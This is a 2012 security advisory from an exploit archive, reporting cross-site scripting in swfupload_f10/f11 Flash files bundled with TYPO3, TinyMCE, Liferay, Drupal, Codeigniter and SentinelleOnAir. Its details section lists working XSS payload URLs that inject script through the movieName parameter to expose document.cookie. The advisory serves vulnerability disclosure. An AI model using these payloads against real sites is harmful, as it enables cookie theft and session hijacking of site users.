SWF Upload f10 / f11 Cross Site Scripting

SWF Upload f10 / f11 Cross Site Scripting: Posted Nov 25, 2012; Authored by MustLive; swfupload_f10.swf and swfupload_f11.swf both suffer from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | a064f09576b12ab9d5a45fe75c0226e749c3b0025cd2959f6177a48202d94b92; Download | Favorite | View

SWF Upload f10 / f11 Cross Site Scripting

Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. This is finial advisory concerning different versions of
this flash application. Earlier I've wrote about swfupload in Archiv plugin
for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,
AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available
in many other web applications.

In previous letters I've wrote concerning web applications with
swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash
Player 8, 9 and 10). And now I'll write about web applications with
swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and
11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin
for TinyMCE, Liferay Portal (Community Edition, which earlier called
Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload
for Codeigniter and SentinelleOnAir - among multiple web applications which
are bundled with swfupload_f10.swf or swfupload_f11.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of SwfUploadPanel for TYPO3 CMS,
Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier
called Standard Edition, and Enterprise Edition), Swfupload for Drupal,
SWFUpload for Codeigniter and SentinelleOnAir. There is no information that
they have fixed this vulnerability in their software (at that this
vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides described
earlier swfupload_f9.swf and swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f10.swf, besides described earlier
swfupload_f9.swf and swfupload_f8.swf.

Swfupload for Drupal:

As it can be seen from the project
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload
for Drupal. But exactly in this project there are no files. But they are in
the project Respectiva (http://code.google.com/p/respectiva/), which is
Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

This is concerning swfupload_f10.swf. And concerning swfupload_f11.swf, then
in Google's index there is only one project - SentinelleOnAir, which
contains swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

SWF Upload f10 / f11 Cross Site Scripting

SWF Upload f10 / f11 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SWF Upload f10 / f11 Cross Site Scripting

Share This

SWF Upload f10 / f11 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems